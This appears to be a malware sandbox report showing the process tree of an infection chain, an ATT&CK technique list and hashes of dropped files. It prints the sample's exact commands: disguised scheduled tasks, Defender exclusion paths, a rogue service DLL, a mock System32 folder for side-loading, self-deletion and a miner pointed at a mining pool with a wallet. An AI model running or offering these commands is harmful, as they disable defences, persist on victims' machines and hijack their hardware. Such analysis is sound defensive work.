C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:18656
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:28836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:18092
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:30268
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3700
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3888
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4040
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4068
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4660
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:3280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4240
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1760 -ip 17601⤵PID:676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 744 -ip 7441⤵PID:4332
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Enumerates system info in registry
PID:43888
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:9420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:22304
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k DcomLaunch1⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:8196 -
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'2⤵PID:14100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:14212
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'2⤵PID:13504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'G:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:13364
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'2⤵PID:12388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'H:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:11568
-
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "c:\windows\system32\winsvcf\x590972.exe"2⤵PID:28180
-
\??\c:\windows\system32\winsvcf\x590972.exe"c:\windows\system32\winsvcf\x590972.exe"3⤵
- Executes dropped EXE
PID:28416 -
C:\Windows\system32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"4⤵PID:28444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:28536
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"4⤵PID:28904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:29312
-
-
-
C:\Windows\system32\cmd.execmd.exe /c timeout /t 5 /nobreak && move "c:\windows\system32\winsvcf\x590972.exe" "C:\Windows\System32" && start "" "C:\Windows\System32\x590972.exe"4⤵PID:18036
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak5⤵
- Delays execution with timeout.exe
PID:29704
-
-
C:\Windows\System32\x590972.exe"C:\Windows\System32\x590972.exe"5⤵
- Drops file in System32 directory
PID:30304 -
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"6⤵PID:30320
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:30296
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"6⤵PID:30540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"7⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:31124
-
-
-
C:\Windows\System32\cmd.execmd.exe /c sc stop x7389466⤵PID:30968
-
C:\Windows\system32\sc.exesc stop x7389467⤵
- Launches sc.exe
PID:30856
-
-
-
C:\Windows\System32\cmd.execmd.exe /c sc delete x7389466⤵PID:30716
-
C:\Windows\system32\sc.exesc delete x7389467⤵
- Launches sc.exe
PID:30672
-
-
-
C:\Windows\System32\cmd.execmd.exe /c mkdir "\\?\C:\Windows \System32"6⤵PID:30652
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "C:\Windows \System32\printui.exe"6⤵PID:30596
-
C:\Windows \System32\printui.exe"C:\Windows \System32\printui.exe"7⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:31220 -
C:\Windows\system32\cmd.execmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"8⤵PID:31240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"9⤵
- Command and Scripting Interpreter: PowerShell
PID:31288
-
-
-
C:\Windows\system32\cmd.execmd.exe /c sc create x123821 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x123821\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x123821.dat" /f && sc start x1238218⤵PID:31588
-
C:\Windows\system32\sc.exesc create x123821 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto9⤵
- Launches sc.exe
PID:31652
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\services\x123821\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x123821.dat" /f9⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
PID:31664
-
-
C:\Windows\system32\sc.exesc start x1238219⤵
- Launches sc.exe
PID:31680
-
-
-
C:\Windows\system32\cmd.execmd.exe /c start "" "C:\Windows\System32\console_zero.exe"8⤵PID:31740
-
C:\Windows\System32\console_zero.exe"C:\Windows\System32\console_zero.exe"9⤵
- Loads dropped DLL
PID:31748 -
C:\Windows\System32\cmd.execmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f10⤵PID:33244
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:33336
-
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"8⤵PID:31824
-
C:\Windows\system32\timeout.exetimeout /t 14 /nobreak9⤵
- Delays execution with timeout.exe
PID:31884
-
-
-
C:\Windows\system32\cmd.execmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"8⤵PID:31912
-
C:\Windows\system32\timeout.exetimeout /t 16 /nobreak9⤵
- Delays execution with timeout.exe
PID:31940
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\x590972.exe"6⤵PID:30584
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak7⤵
- Delays execution with timeout.exe
PID:31196
-
-
-
-
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x715467.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x165305 --max-cpu-usage=502⤵PID:28896
-
\??\c:\windows\system32\winsvcf\x715467.datx715467.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x165305 --max-cpu-usage=503⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:28984
-
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "c:\windows\system32\crypti.exe"2⤵PID:29492
-
\??\c:\windows\system32\crypti.exe"c:\windows\system32\crypti.exe"3⤵PID:29404
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x715467.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x165305 --max-cpu-usage=502⤵PID:29984
-
\??\c:\windows\system32\winsvcf\x715467.datx715467.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x165305 --max-cpu-usage=503⤵
- Suspicious use of FindShellTrayWindow
PID:30020
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k DcomLaunch1⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:31692 -
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'2⤵PID:33844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:33680
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'2⤵PID:34324
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:34536
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'2⤵PID:34564
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'G:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:34512
-
-
-
C:\Windows\System32\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'2⤵PID:34860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'H:\'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:34924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c arp -a2⤵
- Network Service Discovery
PID:16620 -
C:\Windows\system32\ARP.EXEarp -a3⤵
- Network Service Discovery
PID:292
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x574159.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x742977 --max-cpu-usage=502⤵PID:16504
-
\??\c:\windows\system32\winsvcf\x574159.datx574159.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x742977 --max-cpu-usage=503⤵PID:4008
-
-
-
C:\Windows\System32\cmd.execmd.exe /c x574159.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x742977 --max-cpu-usage=502⤵PID:21800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5136
-
-
\??\c:\windows\system32\winsvcf\x574159.datx574159.dat -o zeph.2miners.com:2222 -u ZEPHs7a4EGhZrtixaZm1DHBK3Q7AXXGpN35FeUsUT6dHA3S4PRdkCoKiitx4GPS8dcTmZ6Y8WicgaGY8ukstRi11DaSepfFaeaK --rig-id=x742977 --max-cpu-usage=503⤵PID:23932
-
-
-
C:\Windows\System32\cmd.execmd.exe /c start "" "c:\windows\system32\crypti.exe"2⤵PID:5676
-
\??\c:\windows\system32\crypti.exe"c:\windows\system32\crypti.exe"3⤵PID:17152
-
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:35880
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:35928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:9504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 18312 -ip 183122⤵PID:2852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 18312 -ip 183122⤵PID:18024
-
-
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:30520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 29388 -ip 293882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:30980
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 38384 -ip 383842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:31220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 28224 -ip 282242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:32972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 33420 -ip 334202⤵PID:17012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 35808 -ip 358082⤵PID:3672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 23628 -ip 236282⤵PID:25864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 28560 -ip 285602⤵PID:19040
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Impair Defenses
4Disable or Modify Tools
3Indicator Removal
5Clear Persistence
1Clear Windows Event Logs
1File Deletion
3Modify Registry
9Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
4Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Discovery
Browser Information Discovery
1Network Service Discovery
2Network Share Discovery
1Peripheral Device Discovery
2Process Discovery
1Query Registry
12Remote System Discovery
2System Information Discovery
9System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Virtualization/Sandbox Evasion
4Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\7-Zip\7z.dll.id-FA31BADC.[[email protected]].ncov
Filesize2.5MB
MD5aedb4420528422268aae461dfbd19fa0
SHA162200299593549fd4519040b13fbbb9bb6ead927
SHA256be9af78e5f0bf52cf01139daee6fbe24380b5d638f621aeea6afff6c9deb62ba
SHA512b395a7c808587fdcc0e29f4baac96f97738609b5cf01dbfff48148d1bb4eeafe172eed922551bf59200d8ea1b693b4e678cf55dde31fea0433e71bd85153e23d
-
Filesize
10KB
MD52266f0aecd351e1b4092e82b941211ea
SHA11dced8d943494aa2be39ca28c876f8f736c76ef1
SHA256cbbad0ab02cd973c9c4e73336e3bcd0849aeb2232a7bdbc38f0b50696b5c28c3
SHA5126691cd697bbe7f7a03d9de33869aab289d0a1438b4ee194d2047ded957a726b1d3fe93f08e4a0c677018b20e2521aeb021ab1dc4d1a67927604829ddfd9d59aa
-
Filesize
8KB
MD539f45edb23427ebf63197ca138ddb282
SHA14be1b15912c08f73687c0e4c74af0979c17ff7d5
SHA25677fbb0d8630024634880c37da59ce57d1b38c7e85bdcc14c697db9e79c24e0de
SHA512410f6baad25b256daebfa5d8b8a495429c9e26e7de767b2a0e6e4a75e543b77dbd0abca0335fb1f0d91e49e292b42cedc6edd72d25a3c4c62330e2b31c054cc6
-
Filesize
49KB
MD5d66a021c5973288cbddc24f25cbe7ff5
SHA119c192afbf1d0205b2ef3b21f1eaf79b2de7bd7d
SHA2560addd61d01ea1b70f07eafcb6686f3373a320d09440e217f5b3ae9beb479bc46
SHA51208a5ce796fb4ecbead56f5ca84a3154ef956850a7ef5329e3e5334a954702ef931ed995ac6782c3816210e710770a5a5407df8416182d14cd9f047d0480b6b7a
-
Filesize
18KB
MD55f4e87d1bf8239e4c32ea07a401952b3
SHA18b22247de1b5d78fe7b325e38725dddf9a3becfd
SHA2566317a4bacbed79afd78a0db56f5c071fbc3c45cc9795ab5b4c9ad67bd9ea2d7c
SHA5122a306e039185145845e851df5de861168fd70ac72fdaa0d6727d977c9e8706b2d9c81b5de70aab66c5d0a0a36c728523d9e4c348af9c8ff5d4e0c7d98b6a4df5
-
Filesize
7.3MB
MD5aed024049f525c8ae6671ebdd7001c30
SHA1fadd86e0ce140dc18f33193564d0355b02ee9b05
SHA2569c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494
SHA512ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2
-
Filesize
4.3MB
MD50d442a2b96995983905e3992a5fc371b
SHA1bad952cb84cf7d582ccef7fb6d3bab25899bca77
SHA256e4773d9d2dd2429356f27299bf7ce59e42b97de7c2d673e8af6e7259457a715f
SHA512d653bc52a534f5b64d8d1b77e757c72383543840b643c8b08d34cbbfa354a84a8bb361e742ce65dfbc0f90e39ab60631e013abd6591326adc16aad8883053d9e
-
Filesize
307KB
MD568a99cf42959dc6406af26e91d39f523
SHA1f11db933a83400136dc992820f485e0b73f1b933
SHA256c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3
SHA5127342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75
-
Filesize
730KB
MD5cc3381bd320d2a249405b46982abe611
SHA132a5bc854726c829da2fbaed02ff8d41ea55e432
SHA256781e958b54a63ef673857bfe9c0a5992eb44b06f15d5499f8e35e44b1e1c868c
SHA51273c95936748b9edf103c28d558d885bfee070efc18d318581fb1723769a15bb642976bdfb93b36a0b68d869538e0ee3c1936d613240bf29d3ff64dbb3d20e2e4
-
Filesize
8.4MB
MD52f8fd18eb8f7832baa360c7ea352fb4f
SHA1e6e35646162c50941cb04767c3efb6e877800660
SHA2566c68d28c2fd55a424a21ba96b76d383f652bbed8cb68d7fbfaafcd139a689e44
SHA5121323985d00c239059d490357ee58d6ac70a804da77a706d793774ef1c8feeec52bc1b33ae01b9b51bb8ba787ebbed11b94e7f30c482ad9a7ee89a91bd6189434
-
Filesize
2.8MB
MD56a3268db51b26c41418351e516bc33a6
SHA157a12903fff8cd7ea5aa3a2d2308c910ac455428
SHA256eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c
SHA51243f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33
-
Filesize
429KB
MD5c07e06e76de584bcddd59073a4161dbb
SHA108954ac6f6cf51fd5d9d034060a9ae25a8448971
SHA256cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9
SHA512e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f
-
Filesize
3.9MB
MD5b3834900eea7e3c2bae3ab65bb78664a
SHA1cf5665241bc0ea70d7856ea75b812619cb31fb94
SHA256cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce
SHA512ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909
-
Filesize
7.4MB
MD5530f21922a75517fd8a9f943e6c90751
SHA1a1e2f0196821cb9f7097ba2a93e4bb0cf3336751
SHA2564775ea475df3798d292243807fe77d734d95bf82d42bcd4a9a66fef1385a6b41
SHA51227f8e01d7fa946750f001d8b4b3253f95eff9ed4850c12e652d59f79c502051bc651037679050b8e86fb8a24f9ecb607e533d60ee68dfe060f733c130fa071cd
-
Filesize
1.7MB
MD5f9071a2645e842d87d99a209e698bcb3
SHA1e0b1650c137946661a8c819d298ff62439af8174
SHA25606adfbf6b65db125bf077cf61e8cf7a19c0e191e3c379fc1d98df354b841dc5b
SHA512747bb2b4af494e33fd7a3812250ddae4c1921eea79b107ec4fb633c1fd52e5483562264a681e461bb01c2054e0a2916d08de0e55e5624034445c79efc8aabe75
-
Filesize
1.8MB
MD506cdf5cbdfa34fce7dfde3b0b0fb8258
SHA15acef066031742cc94cbcd9cbb34b2f36b8292d3
SHA256a751a6e56e59c37aa6371702d8e1f1651b28d9632b98ff3e2673f16052594e14
SHA512907fb4404c71b586872f212d12161993309ecc9ba13551ae674da7da2d1a055fe9a618a7ddcc4619e27b297b90b94d73e7765316a60f15d35973b6d38b2ca39b
-
Filesize
15KB
MD50c37ee292fec32dba0420e6c94224e28
SHA1012cbdddaddab319a4b3ae2968b42950e929c46b
SHA256981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1
SHA5122b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b
-
Filesize
8KB
MD5cb8420e681f68db1bad5ed24e7b22114
SHA1416fc65d538d3622f5ca71c667a11df88a927c31
SHA2565850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf
-
Filesize
108KB
MD51fcb78fb6cf9720e9d9494c42142d885
SHA1fef9c2e728ab9d56ce9ed28934b3182b6f1d5379
SHA25684652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02
SHA512cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3
-
Filesize
49KB
MD56946486673f91392724e944be9ca9249
SHA1e74009983ced1fa683cda30b52ae889bc2ca6395
SHA256885fbe678b117e5e0eace7c64980f6072c31290eb36d0e14953d6a2d12eff9cd
SHA512e3241f85def0efefd36b3ffb6722ab025e8523082e4cf3e7f35ff86a9a452b5a50454c3b9530dfdad3929f74a6e42bf2a2cf35e404af588f778e0579345b38c9
-
Filesize
288KB
MD52cbd6ad183914a0c554f0739069e77d7
SHA17bf35f2afca666078db35ca95130beb2e3782212
SHA2562cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f
SHA512ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10
-
Filesize
915KB
MD5b06e67f9767e5023892d9698703ad098
SHA1acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA2568498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA5127972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943
-
Filesize
1.8MB
MD5156b56703fefbd18fa1306c258de1683
SHA19948ca7e6ac6298e68c85701d4f79f24642dd1c4
SHA25621215d6bb6578dfce3f46e462c093ef6a4450247ad1934bede9bbcdfb31e6200
